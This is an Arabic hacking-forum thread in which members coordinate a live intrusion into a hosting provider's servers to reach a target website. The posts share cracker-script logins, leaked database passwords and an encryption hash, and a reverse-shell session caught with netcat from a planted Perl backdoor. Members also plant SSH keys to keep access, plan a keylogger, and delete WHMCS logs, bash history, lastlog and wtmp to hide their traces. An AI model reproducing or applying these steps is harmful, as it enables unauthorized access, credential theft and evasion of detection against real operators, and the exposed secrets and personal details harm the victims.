اللي بدو يحاول يجيب موقع top-t34m

السلام عليكم …

كيف الحال شبااب ؟؟

موقع http://www.top-t34m.net/vb/index.php سهل جدا اختراقه لكن انا حبيت اصعب شوي الطريقه المهم :

هذه استضافه الموقع

[FONT=Arial][SIZE=2][FONT=Arial][SIZE=2][FONT=Arial][SIZE=2][FONT=Arial][SIZE=2][FONT=Arial][SIZE=2][FONT=Arial][SIZE=2]alshahad.com

[/SIZE][/FONT][/SIZE][/FONT][/SIZE][/FONT][/SIZE][/FONT][/SIZE][/FONT][/SIZE][/FONT]انا اختصرت عليكم الوقت بهذا الموقع والسكربت :

http://oshak4ever.com/topic/admin
user: admin
pass: admin

http://oshak4ever.com/topic/cracker.php

اللي يقدر يجيب سي بنل يا ريت … طبعا في حال تم التوصل الى الموقع يا ريت عدم الاختراق لانو بدنا منو شويه امور مهمة …

موفقين شباب ddd:cool::):p;):o:confused:

يعطيك الصحة علاء و مضبوط جدا ان شاء الله انحاولو.

و على فكرة الله اعلم فيهم عاملين بالمايكروزفت.

اوك علااءء اكيد مش راح نحط اندكس لاي هدف حتى نجيب معلومات وافكارررررر اكبر قدر ممكن وبعدين سهل

نشوفه يا ريس
افتح الميل يعم
هههههههه

http://oshak4ever.com/topic/data/media/jen.jeen
PhoeniX
الأوامر هنا
/home/o7shakc/public_html/tmp/

روت التيم صار جاهز معاي :slight_smile:

عكل حال انا حضبط كيلوجر لنا عليهم اشان نجيب البيانات للولووولولزر …
فارس انا عالميل :slight_smile:

منا بكلمك بقالى ساعه يعم
هههههه

بعد كل ده ويطلع التنقل بالسهوله دى
هههههههه

$license=“AlshahadCompany”;
$db_host = “localhost”;
$db_username = “alshahad_site”;
$db_password = “jorajeao29842w_~aaa”;

$db_name = “alshahad_site”;

روت الهدف + بعض الروتات
مرفقه

root.rar (208 Bytes)

ههه جميله ياض انا ملغم الموقع الان وكل شئ بس بشوف تشفيرة الكونفج عندهم اشان تتفك انت باي ميل تكلمني مش لاقيك

تنساش يا برنس الغي كل شلاتك على استضافته + رجع كل الباسووردات مثل ما كانت لاننا بدناش حد يشك فينا

مغيرتش باسات اصلا
هههههه
خد راحتك بقى
انا على ميل الياهو
faris_romantic2000@yahoo.com

هههههههههه نشاط بعد نشاط فارس وعلاء ماشاء لله
حد فيكم يشرح كيف تم التروييت؟ + ايه هو بورت الـssh في السرفر حد فيكم على النت كت يعمل بورت ssh جديد بهذه الطريقة



     pico /etc/ssh/sshd_config 
 

امسح السطر الموجود بية رقم البورت الحالي و أضف مكانة هذا السطر مع تغيير رقم 435 الى رقم البورت الجديد اللي تحب تضيفة

Port 22 
Port 435 

4 - إحفظ الملف

5 - إعمل ريستارت للـ SSH عن طريق تنفيذ الأمر التالي

service sshd restart 

6 - الآن للتأكد ان الـ SSH تم تفعيلة على البورت الجديد نفذ الأمر التالي

netstat -an | grep 435

هههههههههه
بعض ما عندكم يا عم
سهل الترويت
دى سيرفرات الاستضافه
alshahad.com/support/serverstatus.php
مجرد قريت كونفيج الاستضافه اللى حطها علاء ودخلت اللوحه
موجود جوه باسوورد روت الهدف فى list servers accounts
حاجه زى كده
التنقل اتنقل مباشر
cd /user/public_html/support
بورت الهدف تبع ال ssh 22 زى ما هو

لحضات أخي أصيل

شباب شغل جامد

يريت أخي فارس حكاية كيف جبت الكونفيج

يريت شباب تحدفو تحركتكم من whmcs

عشان ميقمعونا
admin
2011-04-14
19:40:19
41.131.224.81
b2e5131228f742382f1fc22ba79a886a
2011-04-14
20:27:39

admin
2011-04-14
20:07:51
41.131.224.81
b2e5131228f742382f1fc22ba79a886a
2011-04-14
20:27:39

Adresse IP 41.131.224.81
Pays Egypte
Région Al Minya
Ville Minia

7d77e825b80cff62a72e680c1c81424f, : faris
[SIZE=4][COLOR=Black]
أعتقد الأبي حقك أخي فارس

تم حدف الابي من لوج whmcs

و رابط الباك اب لحساب الهدف جاي بعد قليل فى المرافقة + مفتاح لى 3 سيرفرات ومنها الهدف وبورتات ssh

وتمام جدا الشغل يرجالة :slight_smile:

جهزو المرحلة الثانية

إبن كلب صحب السيرفر قاعد يدخل ويغير البسورد الحمد لله زرعت مفتاح قبل الشروع في العمل

وفارس معيا في ssh ههههههههههه
[/COLOR][/SIZE]


 22:23:24 up 2 days, 10:44,  4 users,  load average: 0.07, 0.15, 0.13
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    41.131.224.81    20:42   24:31   0.03s  0.03s -bash
root     pts/1    92.62.124.51     19:34   56:26   0.06s  0.06s -bash
root     pts/2    41.248.99.66     21:55   14:16   0.04s  0.04s -bash
root     pts/3    41.248.77.224    22:11    0.00s  0.02s  0.00s w

[SIZE=4][COLOR=Black]

إديت بند لإبي صحب السيرفر وغيرت البسورد لانو غيرو لما شفنا او شكل حد عمل توليد للباك اب ووصل الإميل او موش عارف كيف هههههههههه

المهم محروم من الدخول لسيرفر :cool:

[/COLOR][/SIZE]

ههههههههههههههههه
ايه ده
انا طلعت فى التليفزيون اهه
سيب الايبى يعم خليهم يمسكو صاحب السيبر
خنيق هو اساسا
هههههههههههههه

بخصوص الكونفيج
اتصلت عكسى من شل البيرل اللى حطيته فوق
واتنقلت عادى
[LEFT]

sh-3.2# ./nc -lvp 1337
listening on [any] 1337 …
Connect to [190.139.110.11] from server1.alshahad.com [173.192.4.140] 34979

| sec4ever backdoor , coded by hacker-man |

| - - - - - access generated :slight_smile: - - - - - |

uid=593(o7shakc) gid=589(o7shakc) groups=589(o7shakc)
sh: No job control in this shell
sh-3.2$ id
uid=593(o7shakc) gid=589(o7shakc) groups=589(o7shakc)
sh-3.2$ ls -la /etc/valiases/alshahad.com
-rw-r–r-- 1 alshahad mail 668 mar 24 15:32 /etc/valiases/alshahad.com
sh-3.2$
sh-3.2$ cd /home/alshahad/public_html/support
sh-3.2$ id
uid=593(o7shakc) gid=589(o7shakc) groups=589(o7shakc)
sh-3.2$ pwd
/home/alshahad/public_html/support
sh-3.2$ cat control.php
<?php
if (isset($_get[‘phpsessid’])) {
$requesturi = preg_replace(‘/?phpsessid=[^&]+/’,“”,$_server[‘request_uri’]);
$requesturi = preg_replace(‘/&phpsessid=[^&]+/’,“”,$requesturi);
header(“http/1.1 301 moved permanently”);
header(“location: Http://”.$server[‘http_host’].$requesturi);
exit;
}
ini_set(‘session.use_trans_sid’, 0);
ini_set(session.use_only_cookies, 1);
$license=“alshahadcompany”;
$db_host = “localhost”;
$db_username = “alshahad_site”;
$db_password = "jorajeao29842w
~aaa";
$db_name = “alshahad_site”;
$cc_encryption_hash = “b6nnwb6nvgyt94jmjw6ayz1hcolmmyvnvz1h0yvm4kg4ffgeccf1bxy4ljhyytcj”;
$templates_compiledir = “templates_c/”;
date_default_timezone_set(‘asia/bahrain’);
?>
sh-3.2$

وممكن تتنقل مباشر من شل البيرل بدون مشاكل برضه
فى انتظار مفاتيح ال
ssh
بالتوفيق

[/LEFT]

شباب حافظو على هدوئكم في السيرفر انا طالع الان والاغلب برجع ان شاء الله بكرا المسا فيا ريت تحاولو تحافظو على قله التحركات اشان ما يتغير شئ ويشك الادمن بزيادة …

ياسين حاول تشيل البند عن الادمن اشان هيك 100% بيشك وبيروح علينا الشغل كله … اذا قدرت شيل الباند عن الجميع حتى احنا انا وفارس لانو ماكلين باند الان من السيرفر …

موفقين شباب واهم شئ اننا نحصل يوزرات مش مهم اندكس ابدا ولا حتى السيرفر :slight_smile:

شكلو فاتنى الفلم لكن معليش مخلوفة ان شاء الله.

و شىء طبيعى مش راح يترفع اندكس على الموقع لأنو ما عملو معانا شىء و لا يهمنا توقف الموقع

و انا متاكد من انو ولا واحد يريد اختراق الموقع.

بقى فيه شىء شرورى من اجل الأيبى و الأثار ما تتسجل بالموقع المرات الجايين للى يريد يستعمل الرووت:

1- الدخول للروت ببرنامج WinSCP ثم سحب الملفات التالية لجهازك :


/root/.bash_history
/root/.bash_profile
/var/log/lastlog
/var/log/wtmp

ثم حذفها من السيرفر

و هنا يمكن الدخول للسيرفر ببرنامج البيوتى من اجل اي تلغيم في الرووت و بعد انهاء جميع الشغلات يتم ارجاع

الملفات المطلوبة و هكذا يكون صعب جدا اكتشاف انو فيه واحد دخل بالرووت و الله اعلم يمكن اغلبكم عارفين الشغلة

لكن التذكير مهم ddd. <=== وين كان يوم كنتو اتحاولو مع الرووت ههههه.

الباك اب و الكلام التاني في المرافقة

شباب هو موش عارف كيف حس ودخل الشيل ولقنا اون لين وغير البسورد ووقفتو عشان ميطرناش ويوقف تحميل الباك اب

بس الان معي الباك اب يولع فى 60 دهية هو و السرفر هههههههههههه

المفتاح فى المرفقة لو منفعش نرجع تاني بطريقة تانية

نسيم حدفت اللوج بعد خروجي من السيرفر ههههههههه مراح تلقي شئ وريا :d

b0x.zip (1.02 KB)

ههههه يسين مش راح ادخل يعنى خلاص كملتو الشغل .

بقى لازم شوى تحديد الأهداف يا جماعة و اسناد المهام لأنى اشوف الأمر بدا يتلخبط.

اعتقد لو يبقى واحد فقط على السيرفر الهدف و انا اقترح علاء من اجل ايلغم و الباقى ينساو السيرفر تبع الموقع و راح توصلنا نتائج

التلغيم هنا.

التقل في السيرفرات الأخرى الى يظهر له شىء عادى يحفظو و ايحاول ايقلل الأثار في السيرفر.

يبقى اذا ضرورى انركبو قاعدة ال whmcs على الموقع من اجل ايكون التصفح اسهل و اضمن.

لازم حذف الشلات الموجودة على الموقع المخترق لأنى اشوف في كثير من الملفات مش عارف اذا فيه ناس اخرين على السيرفر هذا

غيركم ؟

اهم شىء اراه انا انو الموقع الهدف لا يتظرر لأنى اي سبب في توقفو يعتبر ظلم و الله اعلم.